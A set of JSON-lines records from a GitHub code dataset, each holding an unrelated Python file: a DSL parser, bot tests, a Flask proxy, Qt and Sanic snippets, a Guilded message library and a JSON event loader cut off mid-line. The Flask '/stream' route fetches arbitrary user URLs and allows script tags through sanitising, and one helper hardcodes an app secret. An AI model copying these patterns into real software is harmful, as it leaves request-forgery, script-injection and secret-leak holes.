re.sub(r'\\n', '', c, flags=re.MULTILINE)\n\ndef get_concepts(c):\n return re.findall(r'concept (\\w+)\\s*{-\\s*(.*?)-}', c, flags=re.MULTILINE | re.DOTALL) \n\ndef get_statements(c):\n return map(lambda s: s.strip(), re.findall(r'([^;]+);', c))\n\ndef parse_definition(d):\n d = d.strip()\n\n what = None\n ser = None\n\n r_primitive = r'^([a-z]+)'\n r_primitive_param = r'^[a-z]+<(.+)>'\n r_literal = r'\"([^\"]+)\"'\n r_tuple = r'\\((.+)\\)'\n r_serializer = r'.+->(.+)'\n\n serializer = re.findall(r_serializer, d)\n \n #get the serializer first\n if serializer:\n (d, serializer) = d.split(\"->\")\n d = d.strip()\n ser = serializer.strip()\n\n primitive = re.findall(r_primitive, d)\n literal_set = re.findall(r_literal, d)\n named_tuple = re.findall(r_tuple, d)\n\n if primitive:\n what = {\n 'type': 'Primitive',\n 'value': primitive[0]\n }\n primitive_param = re.findall(r_primitive_param, d)\n if primitive_param:\n what['params'] = primitive_param[0].split(',')\n elif literal_set:\n what = {\n 'type': 'LiteralSet',\n 'value': literal_set[0].split('|')\n }\n elif named_tuple:\n fields = []\n field_pieces = named_tuple[0].split(\",\")\n for field in field_pieces:\n field = field.strip()\n (name,ttype) = field.split(\":\")\n fields.append({\n 'name': name,\n 'type': ttype\n })\n\n what = {\n 'type': 'Tuple',\n 'value': fields,\n 'serializer': ser\n }\n\n return what\n\ndef get_concepts_from_text(content):\n concepts_parsed = []\n\n content = strip_comments(content)\n content = strip_newlines(content)\n concepts = get_concepts(content)\n for name, inner in concepts:\n statements = get_statements(inner)\n concept_dict = {}\n concept_dict['name'] = name\n concept_dict['definitions'] = {}\n concept_dict['attrs'] = {}\n\n for statement in statements:\n statement = strip_newlines(statement);\n def_tuple = re.findall(r'([A-Z]\\w+\\s*)=(.+)', statement)\n attr_tuple = re.findall(r'@(.+?)\\s*=(.+)', statement)\n if def_tuple:\n (identifier, definition) = def_tuple[0]\n def_parsed = parse_definition(definition)\n concept_dict['definitions'][identifier.strip()] = def_parsed\n elif attr_tuple:\n (attr, attr_val) = attr_tuple[0]\n concept_dict['attrs'][attr.strip()] = attr_val.strip()\n concepts_parsed.append(concept_dict)\n return concepts_parsed\n","repo_name":"elimgoodman/spiral-python","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"25459205829","text":"from blinker import signal\nfrom pd.bot.commands import create_bot, update_game_left_share\nfrom pd.groupon.factory import UserFactory, BatchFactory, OrderFactory\nfrom pd.payment.factory import PaymentFactory\nfrom pd.groupon.models import Order\n\n\ndef test_create_bot(app_context):\n from pd.facebook.schema import UserSchema\n\n bot = create_bot('blah', 'helms')\n assert bot.is_bot\n assert bot.name == 'helms'\n\n dumped = UserSchema().dump(bot).data\n assert dumped['name'] == 'helms'\n\n\ndef test_update_game_left_share(db_session):\n user = UserFactory()\n batch = BatchFactory(total_shares=5)\n for _ in range(10):\n UserFactory(is_bot=True)\n game = batch.create_game()\n db_session.flush()\n order = OrderFactory(game=game, user=user)\n game.left_shares = 3\n db_session.commit()\n update_game_left_share()\n orders = Order.query.filter(Order.game == game).all()\n bot_user = 0\n for o in orders:\n if o.user.is_bot:\n bot_user += 1\n assert len(orders) == 3, bot_user == 2\n payment = PaymentFactory(object=order, user=order.user)\n signal('payment_created').send(payment)\n signal('payment_succeeded').send(payment)\n db_session.commit()\n assert len(game.users) == 3\n\n batch = BatchFactory(total_shares=5)\n game = batch.create_game()\n update_game_left_share()\n assert not game.users\n","repo_name":"alinzel/NOTES","sub_path":"other/panda365/panda365/pd/bot/tests/test_bot_commands.py","file_name":"test_bot_commands.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37902317181","text":"import os\nfrom flask import Flask, request, jsonify\nimport requests\nimport bleach\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello():\n\treturn 'Hello There, from DataWave.'\n\n@app.route('/stream')\ndef stream():\n\turl = request.args.get('url')\n\tr = requests.get(url)\n\tattrs = {'*': ['style']}\n\ttags = ['p', 'em', 'strong', 'script', 'style', 'link']\n\tstyles = ['color', 'font-weight']\n\tresult = bleach.clean( r.text, attrs, tags, styles)\n\tsanitized_result = {'data':{'url':url, 'body': [result]}}\n\treturn jsonify(sanitized_result)\n\nif __name__ == '__main__':\n\tapp.run(debug=True)","repo_name":"datawaveteam/DatawaveServer","sub_path":"datawave-obsolete.py","file_name":"datawave-obsolete.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"19731665774","text":"from PyQt5.QtWidgets import QSlider, QStyle\n\nclass PlayerSlider(QSlider):\n def __init__(self, parent=None):\n super().__init__()\n self.parent = parent\n self.setFixedHeight(5)\n self.setStyleSheet(\"\"\"QSlider::groove:horizontal {\n border: 1px solid red;\n height: 6px;\n margin: 2px 0;\nborder-radius: 3px;\n}\nQSlider::handle:horizontal {\n background: red;\n border: 1px solid red;\n width: 3px;\n margin: -8px 0;\n border-radius: 1px;\n}\nQSlider::add-page:horizontal {\n background: lightgray;\n}\nQSlider::sub-page:horizontal {\n background: red;\n}\"\"\")\n\n\n def mousePressEvent(self, event):\n self.setValue(QStyle.sliderValueFromPosition(self.minimum(), self.maximum(), event.x(), self.width()))\n self.sliderMoved.emit((event.x() / self.width()) * self.maximum())\n\n\n def mouseMoveEvent(self, event):\n self.setValue(QStyle.sliderValueFromPosition(self.minimum(), self.maximum(), event.x(), self.width()))\n self.sliderMoved.emit((event.x() / self.width()) * self.maximum())\n\n\nclass SoundSlider(PlayerSlider):\n pass","repo_name":"mthnzbk/pisi-player","sub_path":"pisiplayer/baritems/slider.py","file_name":"slider.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"26742002273","text":"import sanic\nimport logging\nfrom sanic_cors import CORS\n\napp = sanic.Sanic('data-analysis-project-01')\nCORS(app)\nlogging.basicConfig(\n level=logging.INFO,\n format='[%(asctime)s] [%(levelname)s] %(message)s'\n)\n\n\n@app.get('/server')\nasync def server(request):\n return sanic.response.json({\"message\": \"server : on\"}, 200)\n\nif __name__ == \"__main__\":\n app.run(\n host='0.0.0.0',\n port=3000,\n debug=False,\n access_log=True,\n auto_reload=True,\n dev=True\n )\n","repo_name":"phedrohenriique/data-analysis-project-01","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32074870649","text":"# -*- coding: utf-8 -*-\n# @ProjectName:Python_InterfaceAutoTest\n# @Author: dudu.zhang\n# @File: get_appSecret_MD5.py\n# @Time: 2019-08-18 15:23\n\nimport hashlib\nfrom collections import OrderedDict\n\nfrom six import iteritems\n\n\ndef getAppSecretMD5(data):\n appSecret = '57e458173ec544cfb8c6b28d85165cb3'\n\n sorted_data = OrderedDict(sorted(iteritems(data)))\n\n # convert all str to unicode\n for k, v in sorted_data.items():\n if isinstance(v, str):\n # sorted_data[k] = v.decode('utf-8', errors='ingore')\n sorted_data[k] = v\n raw = '&'.join(\n '%s=%s' % (k, v) for k, v in sorted_data.items()) + appSecret\n\n\n # hash = hashlib.md5()\n # hash.update(raw.encode(encoding='utf-8'))\n\n #md5 = hash.hexdigest()\n # return md5\n\n m = hashlib.md5(raw.encode('utf-8', errors='ingore'))\n sign = m.hexdigest()\n data['sign'] = sign\n return data\n","repo_name":"wengaou/Python_InterfaceAutoTest","sub_path":"utils/get_appSecret_MD5.py","file_name":"get_appSecret_MD5.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33742089675","text":"import asyncio\nimport datetime\nfrom enum import Enum\nimport logging\nfrom typing import Any, Dict, Optional, List\n\nfrom .embed import Embed\nfrom .enums import try_enum, FormType, MessageType, MentionType, MessageFormInputType, MediaType\nfrom .errors import HTTPException\nfrom .file import Attachment\nfrom .utils import ISO8601, parse_hex_number\n\nlog = logging.getLogger(__name__)\n\n\nclass MessageForm:\n def __init__(self, *, state, id):\n self._state = state\n self.id = id\n\n async def fetch(self):\n data = await self._state.get_form_data(self.id)\n return MessageForm.from_dict(data, state=self._state)\n\n @classmethod\n def from_dict(cls, data, *, state, responses=None):\n my_response = data.get('customFormResponse') or {}\n cls.my_response = MessageFormResponse(my_response)\n\n data = data.get('customForm', data)\n if isinstance(responses, dict):\n responses = responses.get('customFormResponses', responses)\n else:\n responses = []\n\n cls.id = data.get('id')\n cls.title = data.get('title', '')\n cls.description = data.get('description', '')\n cls.type = try_enum(FormType, data.get('type'))\n cls.team_id = data.get('teamId')\n cls.team = state._get_team(cls.team_id)\n cls.author_id = data.get('createdBy')\n cls.author = state._get_team_member(cls.team_id, cls.author_id)\n cls.created_at = ISO8601(data.get('createdAt'))\n cls.updated_at = ISO8601(data.get('updatedAt'))\n cls.response_count = int(data.get('responseCount', 0))\n cls.activity_id = data.get('activityId')\n\n form_specs = data.get('formSpecs', {})\n cls.valid = form_specs.get('isValid')\n sections = ((form_specs.get('sections') or [{}])[0].get('fieldSpecs') or [{}])\n cls.sections = [MessageFormSection(section) for section in sections]\n\n cls.public = data.get('isPublic', False)\n cls.deleted = data.get('isDeleted', False)\n\n return cls\n\n @property\n def options(self):\n try:\n return self.sections[0].options\n except IndexError:\n return []\n\n\nclass MessageFormSection:\n def __init__(self, data):\n self.grow = data.get('grow') # not sure what this is\n self.input_type = try_enum(MessageFormInputType, data.get('type'))\n self.label = data.get('label', '')\n self.header = data.get('header', '')\n self.optional = data.get('isOptional')\n self.default_value = data.get('defaultValue')\n self.field_name = data.get('fieldName')\n\n self.options = [MessageFormOption(option) for option in data.get('options', [])]\n\n @property\n def name(self):\n return self.label\n\n\nclass MessageFormOption:\n def __init__(self, data):\n pass\n\n\nclass MessageFormResponse:\n def __init__(self, data):\n pass\n\n\nclass MessageMention:\n \"\"\"A mention within a message. Due to how mentions are sent in message\n payloads, you will usually only have :attr:`.id` unless the object was\n cached prior to this object being constructed.\n\n Attributes\n -----------\n type: :class:`MentionType`\n The type of object this mention is for.\n id: Union[:class:`str`, :class:`int`]\n The object's ID.\n name: Optional[:class:`str`]\n The object's name, if available.\n \"\"\"\n def __init__(self, mention_type: MentionType, id, *, name=None):\n self.type = mention_type\n self.id = id\n self.name = name\n\n def __str__(self):\n return self.name or ''\n\n\n# This doesn't really need to be how it is and may be changed later.\n# This class only exists to store these static values.\nclass Mention(Enum):\n \"\"\"Used for passing special types of mentions to :meth:`~.abc.Messageable.send`\\.\"\"\"\n everyone = 'everyone'\n here = 'here'\n\n def __str__(self):\n return f'@{self.name}'\n\n def to_node_dict(self) -> Dict[str, Any]:\n if self.value == 'everyone':\n mention_data = {\n 'type': 'everyone',\n 'matcher': '@everyone',\n 'name': 'everyone',\n 'description': 'Notify everyone in the channel',\n 'color': '#ffffff',\n 'id': 'everyone',\n }\n elif self.value == 'here':\n mention_data = {\n 'type': 'here',\n 'matcher': '@here',\n 'name': 'here',\n 'description': 'Notify everyone in this channel that is online and not idle',\n 'color': '#f5c400',\n 'id': 'here',\n }\n\n return {\n 'object': 'inline',\n 'type': 'mention',\n 'data': {\n 'mention': mention_data,\n },\n 'nodes': [{\n 'object': 'text',\n 'leaves': [{\n 'object': 'leaf',\n 'text': str(self),\n 'marks': [],\n }],\n }],\n }\n\n\nclass Link:\n \"\"\"A link within a message. Basically represents a markdown link.\"\"\"\n def __init__(self, url, *, name=None, title=None):\n self.url = url\n self.name = name\n self.title = title\n\n def __str__(self):\n return self.url\n\n\nclass HasContentMixin:\n def __init__(self):\n self.mentions: list = []\n self.emojis: list = []\n self.raw_mentions: list = []\n self.channel_mentions: list = []\n self.raw_channel_mentions: list = []\n self.role_mentions: list = []\n self.raw_role_mentions: list = []\n self.embeds: list = []\n self.attachments: list = []\n self.links: list = []\n\n def _get_full_content(self, data):\n try:\n nodes = data['document']['nodes']\n except KeyError:\n # empty message\n return ''\n\n content = ''\n for node in nodes:\n node_type = node['type']\n if node_type == 'paragraph':\n for element in node['nodes']:\n if element['object'] == 'text':\n for leaf in element['leaves']:\n if not leaf['marks']:\n content += leaf['text']\n else:\n to_mark = '{unmarked_content}'\n marks = leaf['marks']\n for mark in marks:\n if mark['type'] == 'bold':\n to_mark = '**' + to_mark + '**'\n elif mark['type'] == 'italic':\n to_mark = '*' + to_mark + '*'\n elif mark['type'] == 'underline':\n to_mark = '__' + to_mark + '__'\n elif mark['type'] == 'strikethrough':\n to_mark = '~~' + to_mark + '~~'\n elif mark['type'] == 'spoiler':\n to_mark = '||' + to_mark + '||'\n else:\n pass\n content += to_mark.format(\n unmarked_content=str(leaf['text'])\n )\n if element['object'] == 'inline':\n if element['type'] == 'mention':\n mentioned = element['data']['mention']\n if mentioned['type'] == 'role':\n content += f'<@{mentioned[\"id\"]}>'\n elif mentioned['type'] == 'person':\n content += f'<@{mentioned[\"id\"]}>'\n\n self.raw_mentions.append(f'<@{mentioned[\"id\"]}>')\n if self.team_id:\n user = self._state._get_team_member(self.team_id, mentioned['id'])\n else:\n user = self._state._get_user(mentioned['id'])\n\n if user:\n self.mentions.append(user)\n else:\n name = mentioned.get('name')\n if mentioned.get('nickname') is True and mentioned.get('matcher') is not None:\n name = name.strip('@').strip(name).strip('@')\n if not name.strip():\n # matcher might be empty, oops - no username is available\n name = None\n if self.team_id:\n self.mentions.append(self._state.create_member(\n team=self.team,\n data={\n 'id': mentioned.get('id'),\n 'name': name,\n 'profilePicture': mentioned.get('avatar'),\n 'colour': parse_hex_number(mentioned.get('color', '000000').strip('#')),\n 'nickname': mentioned.get('name') if mentioned.get('nickname') is True else None,\n 'bot': self.created_by_bot\n }\n ))\n else:\n self.mentions.append(self._state.create_user(data={\n 'id': mentioned.get('id'),\n 'name': name,\n 'profilePicture': mentioned.get('avatar'),\n 'bot': self.created_by_bot\n }))\n elif mentioned['type'] in ('everyone', 'here'):\n # grab the actual display content of the node instead of using a static string\n try:\n content += element['nodes'][0]['leaves'][0]['text']\n except KeyError:\n # give up trying to be fancy and use a static string\n content += f'@{mentioned[\"type\"]}'\n\n elif element['type'] == 'reaction':\n rtext = element['nodes'][0]['leaves'][0]['text']\n content += str(rtext)\n elif element['type'] == 'link':\n link_text = element['nodes'][0]['leaves'][0]['text']\n link_href = element['data']['href']\n link = Link(link_href, name=link_text)\n self.links.append(link)\n if link.url != link.name:\n content += f'[{link.name}]({link.url})'\n else:\n content += link.url\n elif element['type'] == 'channel':\n channel = element['data']['channel']\n content += f'<#{channel.get(\"id\")}>'\n\n channel = self._state._get_team_channel(self.team_id, channel.get('id'))\n if channel:\n self.channel_mentions.append(channel)\n\n content += '\\n'\n\n elif node_type == 'markdown-plain-text':\n try:\n content += node['nodes'][0]['leaves'][0]['text']\n except KeyError:\n # probably an \"inline\" non-text node - their leaves are another node deeper\n content += node['nodes'][0]['nodes'][0]['leaves'][0]['text']\n\n if 'reaction' in node['nodes'][0].get('data', {}):\n emoji_id = node['nodes'][0]['data']['reaction']['id']\n emoji = self._state._get_emoji(emoji_id)\n if emoji:\n self.emojis.append(emoji)\n\n elif node_type == 'webhookMessage':\n if node['data'].get('embeds'):\n for msg_embed in node['data']['embeds']:\n self.embeds.append(Embed.from_dict(msg_embed))\n\n elif node_type == 'block-quote-container':\n quote_content = []\n for quote_node in node['nodes'][0]['nodes']:\n if quote_node.get('leaves'):\n text = str(quote_node['leaves'][0]['text'])\n quote_content.append(text)\n\n if quote_content:\n content += '\\n> {}\\n'.format('\\n> '.join(quote_content))\n\n elif node_type in ['image', 'video']:\n attachment = Attachment(state=self._state, data=node)\n self.attachments.append(attachment)\n\n content = content.rstrip('\\n')\n # strip ending of newlines in case a paragraph node ended without\n # another paragraph node\n return content\n\n\nclass ChatMessage(HasContentMixin):\n \"\"\"A message in Guilded.\n\n There is an alias for this class called ``Message``.\n\n .. container:: operations\n\n .. describe:: x == y\n\n Checks if two messages are equal.\n\n .. describe:: x != y\n\n Checks if two messages are not equal.\n\n Attributes\n -----------\n id: :class:`str`\n The message's ID.\n channel: Union[:class:`abc.TeamChannel`, :class:`DMChannel`]\n The channel this message was sent in.\n webhook_id: Optional[:class:`str`]\n The webhook's ID that sent the message, if applicable.\n \"\"\"\n\n __slots__ = (\n '_state',\n '_raw',\n 'channel',\n '_team',\n 'team_id',\n '_author',\n '_webhook',\n 'id',\n 'type',\n 'webhook_id',\n 'channel_id',\n 'author_id',\n 'created_at',\n 'edited_at',\n 'deleted_at',\n '_replied_to',\n 'replied_to_ids',\n 'silent',\n 'private',\n 'content',\n )\n\n def __init__(self, *, state, channel, data, **extra):\n super().__init__()\n self._state = state\n self._raw = data\n self.channel = channel\n message = data.get('message', data)\n\n self._team = extra.get('team') or extra.get('server')\n self.team_id: Optional[str] = data.get('teamId') or data.get('serverId')\n\n self._author = extra.get('author')\n self._webhook = extra.get('webhook')\n\n if state.userbot:\n self.id: str = data.get('contentId') or message.get('id')\n self.type: MessageType = try_enum(MessageType, message.get('type'))\n self.webhook_id: Optional[str] = data.get('webhookId')\n self.channel_id: str = data.get('channelId') or (channel.id if channel else None)\n self.author_id: str = data.get('createdBy') or message.get('createdBy')\n\n self.created_at: datetime.datetime = ISO8601(data.get('createdAt'))\n self.edited_at: Optional[datetime.datetime] = ISO8601(message.get('editedAt'))\n self.deleted_at: Optional[datetime.datetime] = extra.get('deleted_at') or ISO8601(data.get('deletedAt'))\n\n self._replied_to = []\n self.replied_to_ids: List[str] = message.get('repliesToIds') or message.get('repliesTo') or []\n self.silent: bool = message.get('isSilent', False)\n self.private: bool = message.get('isPrivate', False)\n if data.get('repliedToMessages'):\n for message_data in data['repliedToMessages']:\n message_ = self._state.create_message(data=message_data)\n self._replied_to.append(message_)\n else:\n for message_id in self.replied_to_ids:\n message_ = self._state._get_message(message_id)\n if not message_:\n continue\n self._replied_to.append(message_)\n\n self.content: str = self._get_full_content(message['content'])\n\n else:\n self.id: str = message['id']\n self.type: MessageType = try_enum(MessageType, message['type'])\n self.channel_id: str = message['channelId']\n self.content: str = message['content']\n self.embeds: List[Embed] = [Embed.from_dict(embed) for embed in (message.get('embeds') or [])]\n\n self.author_id: str = message.get('createdBy')\n self.webhook_id: Optional[str] = message.get('createdByWebhookId')\n\n self.created_at: datetime.datetime = ISO8601(message.get('createdAt'))\n self.edited_at: Optional[datetime.datetime] = ISO8601(message.get('updatedAt'))\n self.deleted_at: Optional[datetime.datetime] = None\n\n self._replied_to = []\n self.replied_to_ids: List[str] = message.get('replyMessageIds') or []\n self.private: bool = message.get('isPrivate') or False\n self.silent: bool = message.get('isSilent') or False\n\n def __eq__(self, other) -> bool:\n return isinstance(other, ChatMessage) and self.id == other.id\n\n def __repr__(self) -> str:\n return f'<{self.__class__.__name__} id={self.id!r} author={self.author!r} channel={self.channel!r}>'\n\n @property\n def team(self):\n \"\"\"Optional[:class:`.Team`]: The team this message was sent in. ``None`` if the message is in a DM.\"\"\"\n return self._team or self._state._get_team(self.team_id)\n\n @property\n def server(self):\n \"\"\"Optional[:class:`.Team`]: This is an alias of :attr:`.team`.\"\"\"\n return self.team\n\n @property\n def guild(self):\n \"\"\"|dpyattr|\n\n This is an alias of :attr:`.team`.\n \"\"\"\n return self.team\n\n @property\n def author(self):\n \"\"\"Optional[:class:`~.abc.User`]: The user that created this message, if they are cached.\"\"\"\n if self._author:\n return self._author\n\n user = None\n if self.team:\n user = self.team.get_member(self.author_id)\n\n if not user:\n user = self._state._get_user(self.author_id)\n\n if self.webhook_id or self._webhook:\n data = {\n 'id': self.author_id,\n 'type': 'bot',\n }\n if self._webhook:\n data['name'] = self._webhook.name\n data['profilePicture'] = self._webhook.avatar.url if self._webhook.avatar else None\n\n user = self._state.create_user(data=data)\n\n return user\n\n @property\n def created_by_bot(self) -> bool:\n return self.author.bot if self.author else self.webhook_id is not None\n\n @property\n def share_url(self) -> str:\n if self.channel:\n return f'{self.channel.share_url}?messageId={self.id}'\n return None\n\n @property\n def jump_url(self) -> str:\n return self.share_url\n\n @property\n def embed(self):\n return self.embeds[0] if self.embeds else None\n\n @property\n def replied_to(self):\n return self._replied_to or [self._state._get_message(message_id) for message_id in self.replied_to_ids]\n\n async def delete(self, *, delay: Optional[float] = None) -> None:\n \"\"\"|coro|\n\n Delete this message.\n\n Parameters\n -----------\n delay: Optional[:class:`float`]\n If provided, the number of seconds to wait in the background before\n deleting this message. If the deletion fails, then it is silently ignored.\n\n Raises\n -------\n Forbidden\n You do not have proper permissions to delete this message.\n NotFound\n This message has already been deleted.\n HTTPException\n Deleting this message failed.\n \"\"\"\n\n if self._state.userbot:\n coro = self._state.delete_message(self.channel_id, self.id)\n else:\n coro = self._state.delete_channel_message(self.channel_id, self.id)\n\n if delay is not None:\n\n async def delete(delay: float):\n await asyncio.sleep(delay)\n try:\n await coro\n except HTTPException:\n pass\n else:\n self.deleted_at = datetime.datetime.utcnow()\n\n asyncio.create_task(delete(delay))\n\n else:\n await coro\n self.deleted_at = datetime.datetime.utcnow()\n\n async def edit(self, *, content: str = None, embed = None, embeds: Optional[list] = None, file = None, files: Optional[list] = None):\n \"\"\"|coro|\n\n Edit this message.\n \"\"\"\n if self._state.userbot:\n payload = {\n 'old_content': self.content,\n 'old_embeds': [embed.to_dict() for embed in self.embeds],\n 'old_files': [await attachment.to_file() for attachment in self.attachments]\n }\n if content:\n payload['content'] = content\n if embed:\n embeds = [embed, *(embeds or [])]\n if embeds is not None:\n payload['embeds'] = [embed.to_dict() for embed in embeds]\n if file:\n files = [file, *(files or [])]\n if files is not None:\n pl_files = []\n for file in files:\n file.type = MediaType.attachment\n if file.url is None:\n await file._upload(self._state)\n pl_files.append(file)\n\n payload['files'] = pl_files\n\n await self._state.edit_message(self.channel_id, self.id, **payload)\n\n else:\n await self._state.update_channel_message(self.channel_id, self.id, content=content)\n\n async def add_reaction(self, emoji):\n \"\"\"|coro|\n\n Add a reaction to this message.\n\n Parameters\n -----------\n :class:`.Emoji`\n The emoji to react with.\n \"\"\"\n if self._state.userbot:\n return await self._state.add_message_reaction(self.channel_id, self.id, emoji.id)\n elif hasattr(emoji, 'id'):\n return await self._state.add_reaction_emote(self.channel_id, self.id, emoji.id)\n else:\n return await self._state.add_reaction_emote(self.channel_id, self.id, emoji)\n\n async def remove_self_reaction(self, emoji):\n \"\"\"|coro|\n\n |onlyuserbot|\n\n Remove your reaction to this message.\n\n Parameters\n -----------\n :class:`.Emoji`\n The emoji to remove.\n \"\"\"\n return await self._state.remove_self_message_reaction(self.channel_id, self.id, emoji.id)\n\n async def reply(self, *content, **kwargs):\n \"\"\"|coro|\n\n Reply to a message. Functions the same as\n :meth:`abc.Messageable.send`, but with the ``reply_to`` parameter\n already set.\n \"\"\"\n kwargs['reply_to'] = [self]\n return await self.channel.send(*content, **kwargs)\n\n async def create_thread(self, *content, **kwargs):\n \"\"\"|coro|\n\n |onlyuserbot|\n\n Create a thread on this message.\n\n .. warning::\n\n This method currently does not work.\n \"\"\"\n kwargs['message'] = self\n return await self.channel.create_thread(*content, **kwargs)\n\n async def pin(self):\n \"\"\"|coro|\n\n |onlyuserbot|\n\n Pin this message.\n \"\"\"\n await self._state.pin_message(self.channel.id, self.id)\n\n async def unpin(self):\n \"\"\"|coro|\n\n |onlyuserbot|\n\n Unpin this message.\n \"\"\"\n await self._state.unpin_message(self.channel.id, self.id)\n\n async def ack(self, clear_all_badges: bool = False) -> None:\n \"\"\"|coro|\n\n |dpyattr|\n\n |onlyuserbot|\n\n Mark this message's channel as seen; acknowledge all unread messages\n within it.\n\n There is no endpoint for acknowledging just one message and as such\n this method is identical to :meth:`~.abc.Messageable.seen`.\n \"\"\"\n return await self.channel.seen(clear_all_badges=clear_all_badges)\n\nMessage = ChatMessage\n","repo_name":"cosmogonies/VirtualRoleplaying","sub_path":".local/lib/python3.9/site-packages/guilded/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":24669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"40557909394","text":"class Solution:\n \"\"\"\n Given an integer array nums and an integer k, return the maximum length of a\nsubarray that sums to k.\n If there is not one, return 0 instead.\n \"\"\"\n\n def maxSubArrayLen(self, nums: List[int], k: int) -> int:\n psums = {}\n S = 0\n best = -float(\"inf\")\n for i, num in enumerate(nums):\n S += num\n psums.setdefault(S, i)\n if S == k:\n best = max(best, i + 1)\n if S - k in psums:\n best = max(i - psums[S - k], best)\n return best if best != -float(\"inf\") else 0\n","repo_name":"QuakerOATI/leetcode","sub_path":"python/max_size_subarray.py","file_name":"max_size_subarray.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41705700244","text":"import sys\n\nfrom cli import menu, rename\nfrom system import *\n\n\n__author__ = 'Wojciech Urbański'\nconfig = None\n\n\n@rename(\"Configure system\")\ndef create_system():\n print(\"Creating system configuration with parameters time = %d, sample_rate = %d\" % (1, 200))\n SystemConfiguration(time=1, sample_rate=200)\n\n\n@rename(\"Quit\")\ndef quit_app():\n raise SystemExit\n\n\ndef main():\n options = [quit_app, create_system]\n menu(\"Main Menu\", options)()\n\n\nif __name__ == '__main__':\n sys.exit(main())","repo_name":"wurbanski/pm-modulation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25226442689","text":"#jidskjflsk\ndef factorial(n):\n if n == 0:\n return 1\n else:\n return n * factorial(n-1)\ns,k=input().split()\ns=int(s)\nk=int(k)\nd=factorial(s)//factorial(k)\nprint(d)\n","repo_name":"Kalaiselvan1503/GuviPlayer","sub_path":"fact_fun.py","file_name":"fact_fun.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40437626043","text":"import json\n\n\ndef loadjson_func(file_url):\n #define variables\n source_file_url =file_url\n target_file_url =\"../Data/output/events_summary.json\"\n\n journeyjson = {}\n journeyjson['Type'] = {}\n journeyjson['Data'] = []\n timetablejson = {}\n timetablejson['Type'] = {}\n timetablejson['Data'] = []\n stopsjson = {}\n stopsjson['Type'] = {}\n stopsjson['Data'] = []\n #open the file to load for logic checking\n with open(source_file_url,'r') as json_data:\n classlist = json.load(json_data)\n i = 0\n while i < len(classlist):\n #load only succesful journey posts (statuscode = 201)\n if classlist[i].get(\"requestMethod\") == 'POST' and 'journey' in classlist[i].get(\"requestUri\"):\n if classlist[i]['responseStatusCode'] == 201:\n\n journeyrequestid = classlist[i].get(\"requestId\")\n journeydict = json.loads(classlist[i]['responseContentBody'])\n journeyorigin = journeydict['geometry']['coordinates'][0]\n journeydestination = journeydict['geometry']['coordinates'][1]\n\n requestContentBody = classlist[i]['requestContentBody']\n requestTimestamp = classlist[i]['requestTimestamp']\n responseContentBody = classlist[i].get(\"responseContentBody\")\n responseContentBodydict = json.loads(classlist[i]['responseContentBody'])\n journeymodes = responseContentBodydict['only']['modes']\n try:\n total_travel_time = responseContentBodydict['itineraries'][0]['duration']\n except IndexError:\n total_travel_time = ''\n requestQueryString = classlist[i].get(\"requestQueryString\")\n response = classlist[i]['responseStatusCode']\n journeyjson['Type'] = \"journey\"\n journeyjson['Data'].append({\n \"Origin\": journeyorigin,\n \"Destination\": journeydestination,\n \"Modes_Used\": journeymodes,\n \"Total_Travel_Time\": total_travel_time,\n \"Timestamp\": requestTimestamp\n })\n\n\n\n #load timetable calls and only successful ones, also logic to exclude lines calls as the uri in some cases was similar to the timetable one\n elif 'timetables' in classlist[i].get(\"requestUri\") and '/api/lines' not in classlist[i].get(\"requestUri\"):\n if classlist[i]['responseStatusCode'] == 200:\n responseContentBody = classlist[i].get(\"responseContentBody\")\n requestQueryString = classlist[i].get(\"requestQueryString\")\n response = classlist[i]['responseStatusCode']\n requestUri = classlist[i].get(\"requestUri\")\n requestTimestamp = classlist[i]['requestTimestamp']\n timtabledict = json.loads(classlist[i]['responseContentBody'])\n try:\n agency_id = timtabledict[0]['line']['agency']['id']\n except IndexError:\n agency_id = ''\n try:\n agency_name = timtabledict[0]['line']['agency']['name']\n except IndexError:\n agency_name = ''\n timetablejson['Type'] = \"timetable\"\n timetablejson['Data'].append({\n \"AgencyName\": agency_name,\n \"AgencyID\": agency_id,\n \"Timestamp\": requestTimestamp\n })\n\n # load stops calls and only succesful ones statuscode = 200\n elif '/api/stops' in classlist[i].get(\"requestUri\"):\n if classlist[i]['responseStatusCode'] == 200:\n requestContentBody = classlist[i].get(\"requestContentBody\")\n responseContentBody = classlist[i].get(\"responseContentBody\")\n requestQueryString = classlist[i].get(\"requestQueryString\")\n requestUri = classlist[i].get(\"requestUri\")\n requestTimestamp = classlist[i]['requestTimestamp']\n if not responseContentBody:\n stopsdict = json.loads(responseContentBody)\n try:\n stops_agency_name = stopsdict['agency']['name']\n except IndexError:\n stops_agency_name = ''\n try:\n stops_agency_id = stopsdict['agency']['id']\n except IndexError:\n stops_agency_id = ''\n response = classlist[i]['responseStatusCode']\n stopsjson['Type'] = \"stops\"\n stopsjson['Data'].append({\n \"AgencyName\": stops_agency_name,\n \"AgencyID\": stops_agency_id,\n \"count\": 1,\n \"Timestamp\": requestTimestamp\n })\n\n\n\n i=i+1\n jsonfinal = 